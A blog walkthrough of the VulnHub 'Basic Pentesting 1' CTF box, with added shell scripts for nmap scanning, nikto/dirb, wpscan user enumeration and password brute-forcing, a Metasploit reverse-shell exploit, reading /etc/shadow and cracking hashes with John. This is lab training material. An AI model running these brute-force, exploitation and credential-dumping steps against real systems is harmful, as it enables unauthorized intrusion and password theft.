VulnHub Walkthroughs: Box 1

Adeesh Unnikrishnan
5 min read · Mar 27, 2022
CTF image (a commonly found one, so nothing new; why don't you scroll and read 😉)

Dear Hackers,
This is the first box of my VulnHub CTF series, in which I explain the tools, methodologies and logic used to get root on each box.

1. Box Name — Basic Pentesting 1

Description : An easy beginner level box

Download Link — https://www.vulnhub.com/entry/basic-pentesting-1,216/

Setting Up :
1. Make sure the VM is powered on and that its network adapter matches the one your Kali machine uses, i.e. bridged or NAT; otherwise the two will not share a subnet.

2. Make a note of your own IP address and subnet using ifconfig (or ip a).

Step 1: Discovering the IP address of the target machine

This is the common first step for any target. Once a host is discovered we can find its open ports and the services behind them. Two methods to discover hosts:
1. Nmap
2. Netdiscover Tool

i) Nmap:
Syntax: nmap -sn your_subnet
nmap, initiating the Nmap tool.
-sn, the "ping scan": it discovers live hosts and does no port scan at all, which makes it quick and a good option for host discovery. On a local subnet nmap does this with ARP requests, so it also finds hosts that drop ICMP.
your_subnet, your subnet in CIDR notation, e.g. 10.0.0.0/24.

ii) Netdiscover tool:
Syntax: netdiscover -r 192.168.0.0/24
Installation: apt-get install netdiscover
netdiscover, initiating the Netdiscover tool, which finds hosts by sending ARP requests.
-r, scan the given range instead of auto-scanning.
your_subnet, your subnet in CIDR notation, e.g. 10.0.0.0/24.

Step 2 : Discovering the Services running on the Target

First, we need to scan the target for open ports, the services behind them and, if possible, the OS. The best tool for this is Nmap. Note that -sV alone does not report the OS; add -O (or -A) for OS detection, which needs root.
There are other scan options, such as fragmenting packets to evade firewalls and IDS, but they are not needed for this box. (That will be a story for another day 😎)
-sV, version scanning; it probes the services on the open ports and reports their versions, which is what later feeds the exploit search
-T4, makes the scan faster (aggressive timing)
-p-, scans all 65535 TCP ports (by default nmap scans only the 1000 most common ones, so a service on an unusual port would be missed)
-v, verbose, providing detailed output while the scan runs

Second, if port 80 is open, type the target IP into a browser and inspect the website, page source included.
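Putting Steps 1 and 2 together, here is an added example that is not code from the original post: a small POSIX shell script that runs the host discovery and service scans described above and then parses nmap's grepable output (-oG) so the list of open ports can drive the next steps. The subnet, the target IP and the sample scan output are constructed placeholders, and -O (OS detection, needs root) is added on top of the flags listed above.

```shell
#!/bin/sh
# Added example, not code from the original post. Runs the recon scans from
# Steps 1 and 2 and parses nmap's grepable output to list open ports.

# Step 1: host discovery. On a local subnet nmap -sn uses ARP requests, so it
# lists live hosts without touching any port. live_hosts parses the -oG text
# (one "Host: <ip> ()  Status: Up" line per live host) and prints the IPs.
live_hosts() {                # grepable nmap text on stdin
    awk '/Status: Up/ { print $2 }'
}
discover_hosts() {            # $1 = subnet in CIDR form, e.g. 10.0.0.0/24
    nmap -sn -oG - "$1" | live_hosts
}

# Step 2: service scan. -sV versions, -p- all 65535 TCP ports (default is the
# top 1000), -T4 faster timing, -O OS detection (needs root), -oG grepable file.
scan_target() {               # $1 = target IP, $2 = output file (.gnmap)
    sudo nmap -sV -O -T4 -p- -v -oG "$2" "$1"
}

# Parse .gnmap text from stdin. The tab-separated "Ports:" field holds entries
# of the form port/state/proto/owner/service/rpc/version; print "port service
# version" for the open ones only, skipping filtered/closed entries.
open_ports() {
    awk -F'\t' '/^Host:.*Ports:/ {
        for (i = 1; i <= NF; i++)
            if ($i ~ /^Ports: /) ports = substr($i, 8)
        n = split(ports, entry, ", ")
        for (j = 1; j <= n; j++) {
            split(entry[j], f, "/")
            if (f[2] == "open") print f[1], f[5], f[7]
        }
    }'
}

# Map the open ports (stdin, as printed by open_ports) to the next step in the post.
next_steps() {
    awk '$1 == 80 || $1 == 443 { print "port " $1 ": open it in a browser, then nikto and dirb" }
         $1 == 21 { print "port 21: note the FTP banner and check it with searchsploit" }
         $1 == 22 { print "port 22: ssh, useful once credentials are cracked" }'
}

# Constructed sample of grepable output (not a real scan) so the parser can be
# exercised offline: two open ports and one filtered port that must be skipped.
sample_gnmap() {
    printf 'Host: 10.0.0.5 ()\tStatus: Up\n'
    printf 'Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2/, 80/open/tcp//http//Apache httpd 2.4.18/, 23/filtered/tcp//telnet///\tIgnored State: closed (65532)\n'
}

# Usage against a live box (uncomment):
#   discover_hosts 10.0.0.0/24
#   scan_target 10.0.0.5 target.gnmap && open_ports < target.gnmap | next_steps
sample_gnmap | open_ports | next_steps
```

Parsing -oG rather than eyeballing the normal output matters once you scan more than one box: the same pipeline runs unchanged against any .gnmap file, and the "open" filter is what keeps filtered ports from being mistaken for live services.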

Step 3 : Discovering Web Service and Directories

1. Using nikto to learn about the web server software and the technologies running on it; in this box it reveals WordPress among others. The nikto scan discovers the directory /secret. Try target_ip_addr/secret in the browser.

2. Using dirb to brute-force directories and other hidden paths that nikto does not list.

Step 4 : Adding a hosts entry and running wpscan (since the site runs WordPress)

1. Adding a hosts entry
    The WordPress site links to its configured host name rather than to the IP, so that name must resolve locally. To add it (writing /etc/hosts needs root):
    echo "ip_addr name_of_host" | sudo tee -a /etc/hosts
    (if you cannot find the host name of the target, look at the URL bar after opening the target IP in the browser: the site redirects to it)

2. wpscan against the WordPress site to enumerate user names and brute-force their passwords
where,
--url, the site URL (older wpscan versions used -u)
--enumerate u, lists the WordPress user accounts
--passwords, the wordlist to use for the brute-force attack against those users (--wordlist in older versions)
--max-threads 2, caps the number of concurrent requests; the default is 5, so 2 is gentler on a fragile VM rather than faster
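Steps 3 and 4 as an added shell example (not code from the original post): the nikto and dirb runs, an idempotent helper for the hosts entry, and the two wpscan invocations. The target IP, host name and wordlist path are assumed placeholders, and the wpscan flags are the current long-form ones.

```shell
#!/bin/sh
# Added example, not code from the original post: web enumeration for Steps 3
# and 4. Target IP, host name and wordlist path are placeholders.

TARGET=10.0.0.5                               # assumed target IP
VHOST=target.local                            # assumed name the site redirects to
WORDLIST=/usr/share/wordlists/rockyou.txt     # assumed password wordlist

# Step 3: nikto reports the server software and misconfigurations (it is what
# surfaces /secret in the post); dirb brute-forces paths with its common.txt list.
web_enum() {                  # $1 = base URL, e.g. http://10.0.0.5
    nikto -h "$1"
    dirb "$1"
}

# Add a hosts entry only if the name is not already mapped, so repeated runs
# do not pile up duplicate lines. $1 = IP, $2 = name, $3 = hosts file.
# /etc/hosts is root-owned, so fall back to sudo tee when it is not writable.
add_host() {
    if awk -v n="$2" '{ for (i = 2; i <= NF; i++) if ($i == n) found = 1 }
                       END { exit !found }' "$3"; then
        return 0                               # already present, nothing to do
    fi
    if [ -w "$3" ]; then
        printf '%s %s\n' "$1" "$2" >> "$3"
    else
        printf '%s %s\n' "$1" "$2" | sudo tee -a "$3" > /dev/null
    fi
}

# Step 4: first list the WordPress users, then try the wordlist against one of
# them. --max-threads caps concurrency (default 5); keep it low on a small VM.
wp_enum() {                   # $1 = WordPress URL
    wpscan --url "$1" --enumerate u --max-threads 2
}
wp_brute() {                  # $1 = WordPress URL, $2 = user name, $3 = wordlist
    wpscan --url "$1" --usernames "$2" --passwords "$3" --max-threads 2
}

# Usage against a live box (uncomment):
#   web_enum "http://$TARGET"
#   add_host "$TARGET" "$VHOST" /etc/hosts
#   wp_enum "http://$VHOST/secret"
#   wp_brute "http://$VHOST/secret" admin "$WORDLIST"
```

The hosts helper takes the file as a parameter so it can be tried against a scratch copy before touching /etc/hosts; the name check looks at every field of a line, since hosts entries may carry aliases.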

Step 5 : Finding Exploits

Finding exploits is the tricky part, but tools like searchsploit and msfconsole search the Exploit-DB and Metasploit module databases for you, using the service versions that nmap reported. There are other sources, like exploit-db itself, which I'll cover in future posts.
1. Using searchsploit

2. Using msfconsole ( Check below )

Step 6 : Exploiting using Metasploit

Steps in msfconsole to exploit (these are the common steps for Metasploit):
1. search for an exploit module matching the service and version found by nmap
2. choose the desired exploit with the "use" command. (NOTE: prefer modules ranked "excellent"; the rank reflects reliability, so they have the highest chance of working without crashing the service.)
3. type "show options" to see and set the parameters, such as the target host IP (RHOSTS) and target port (RPORT).
4. Now we need to set the payload, i.e. what runs on the target once the exploit lands. A shell payload spawns a command prompt there; with a reverse shell the target connects back to us, so LHOST must be set to our own IP. (NOTE: a reverse TCP shell works most of the time, because outbound connections from the target are rarely blocked.)
5. All done, type exploit
6. From here on the procedure depends on the target OS. On Linux the password hashes are stored in /etc/shadow, readable only as root; on Windows they are in the SAM hive, which a meterpreter session dumps with hashdump.
type: cat /etc/shadow

Step 7 : Password Cracking

Password cracking can be done with many tools, such as Cain & Abel, John the Ripper, hashcat, etc.
Here we shall use John the Ripper via the "john" command:
1. Save the hashes in a text file (ideally the unshadow output of /etc/passwd and /etc/shadow, so john also gets the user names).
2. To crack, type john txt_filename; john's default modes are slow against salted sha512crypt hashes, so supply a wordlist with john --wordlist=rockyou.txt txt_filename.
3. To show the cracked passwords, type john --show txt_filename.
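Steps 6 and 7 as an added shell example (not code from the original post): filtering the hashes worth cracking out of an /etc/shadow copy, recognising the hash scheme from its prefix, and the unshadow plus john run. The shadow lines in the block are constructed samples, not hashes from the box, and the file names are assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post: preparing /etc/shadow hashes
# for John the Ripper (Steps 6 and 7). The shadow lines below are constructed
# samples, not hashes from the box.

# /etc/shadow is root-only; its second field holds the hash. Locked or
# password-less accounts carry "*", "!" or nothing there and cannot be cracked,
# so keep only entries whose hash starts with "$". Prints "user:hash" lines.
crackable_hashes() {          # shadow-format text on stdin
    awk -F: '$2 ~ /^\$/ { print $1 ":" $2 }'
}

# Identify the crypt(3) scheme from the "$id$" prefix. john autodetects it, but
# the prefix tells you in advance how slow the crack will be and which hashcat
# mode to use if you switch tools.
hash_type() {                 # $1 = hash string
    case "$1" in
        '$1$'*) echo "md5crypt (hashcat -m 500)" ;;
        '$5$'*) echo "sha256crypt (hashcat -m 7400)" ;;
        '$6$'*) echo "sha512crypt (hashcat -m 1800)" ;;
        '$y$'*) echo "yescrypt" ;;
        *)      echo "unknown" ;;
    esac
}

# On the box (as root) copy both files off, e.g. cat /etc/passwd > passwd.txt
# and cat /etc/shadow > shadow.txt, then crack on the attacker machine.
# unshadow merges them so john sees user names and GECOS data; wordlist mode is
# far more effective than the default modes for a CTF box; --show prints the
# cracked user:password pairs afterwards.
crack() {                     # $1 = passwd copy, $2 = shadow copy, $3 = wordlist
    unshadow "$1" "$2" > hashes.txt
    john --wordlist="$3" hashes.txt
    john --show hashes.txt
}

# Constructed sample shadow excerpt (not from the box): one crackable account,
# one locked system account, one with no password set.
sample_shadow() {
    printf 'root:$6$saltsalt$%s:18000:0:99999:7:::\n' \
        'NtJzK0o1r2lu9sEyeD9i4q4GdL3xH3HRXkQ4cBaMZvXXW3o9ykRFDo4e0kRzWmJvBd8LpvjNehhF9n8zOUzSpJ'
    printf 'daemon:*:17737:0:99999:7:::\n'
    printf 'sync:!:17737:0:99999:7:::\n'
}

# Offline demonstration of the filter; crack passwd.txt shadow.txt rockyou.txt
# is the live run.
sample_shadow | crackable_hashes
```

Filtering first is not just tidiness: every `*` or `!` line you feed john is a hash it silently skips, and with dozens of system accounts it is easy to miss that the one real user hash was never loaded.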

Summary :

In a nutshell,
* Host discovery — netdiscover, nmap
* Scanning — nmap
* Discovering web services — dirb, nikto
* Wordpress scan — wpscan
* Finding exploits — Searchsploit, msfconsole
* Exploiting — Metasploit/msfconsole
* Password Cracking — John (JohnTheRipper)

Yeah, that's it for this box. In the next post I shall describe even more in-depth methodologies. Happy hacking 😍.


Adeesh Unnikrishnan

Future enthusiast, Researcher, Hacker, Techie, with high curiosity in gaining tons of knowledge.